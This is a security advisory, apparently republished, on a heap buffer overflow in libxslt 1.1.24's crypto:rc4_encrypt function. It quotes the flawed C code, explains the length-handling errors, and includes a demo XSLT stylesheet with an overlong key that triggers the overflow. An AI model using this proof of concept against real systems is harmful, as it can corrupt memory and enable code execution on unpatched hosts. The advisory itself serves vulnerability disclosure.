|
|
|
|
| |
| A vulnerability in libxslt allows attackers that can supply an arbitrary XSLT file to cause the library to overflow an internal buffer which in turn can be used to execute arbitrary code. |
| |
Credit:
The information has been provided by Chris Evans.
The original article can be found at: http://scary.beasts.org/security/CESA-2008-003.html
|
| |
Vulnerable Systems:
* libxslt version 1.1.24
Similarly to Chris's Ghostscript note, XSLT is a turing-complete language. Executing untrusted programs in said languages remains a challenge. The weak points on the attack surface are often the built-in functions, which do things like take integers as arguments...
This advisory primarily notes a heap-based buffer overflow in the crypto:rc4_encrypt function in crypto.c. The issue is over-trust of the length of an incoming key string:
static void
exsltCryptoRc4EncryptFunction (xmlXPathParserContextPtr ctxt, int nargs) {
...
key = xmlXPathPopString (ctxt);
key_len = xmlUTF8Strlen (str);
...
padkey = xmlMallocAtomic (RC4_KEY_LENGTH);
key_size = xmlUTF8Strsize (key, key_len);
memcpy (padkey, key, key_size);
memset (padkey + key_size, '\0', sizeof (padkey));
...
As can be seen, the padkey heap allocation is of a fixed size, but an arbitrary length string from the XSL function argument is copied on top.
In addition, the key_len variable appears to be initialized incorrectly. The length of the plaintext string is used rather than the length of the key string.
Furthermore, the attempt to zero-pad the key looks faulty. sizeof(padkey) will always be sizeof(void*).
The function crypto:rc4_decrypt would seem to suffer the same issues.
Demo evil stylesheet:
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:str="http://exslt.org/strings"
xmlns:crypto="http://exslt.org/crypto"
xmlns:math="http://exslt.org/math"
extension-element-prefixes="str crypto math">
<xsl:template match="/">
<xsl:value-of select="crypto:rc4_encrypt('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA', 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')"/>
blah
</xsl:template>
</xsl:stylesheet>
|
|
|
|
|
|
|
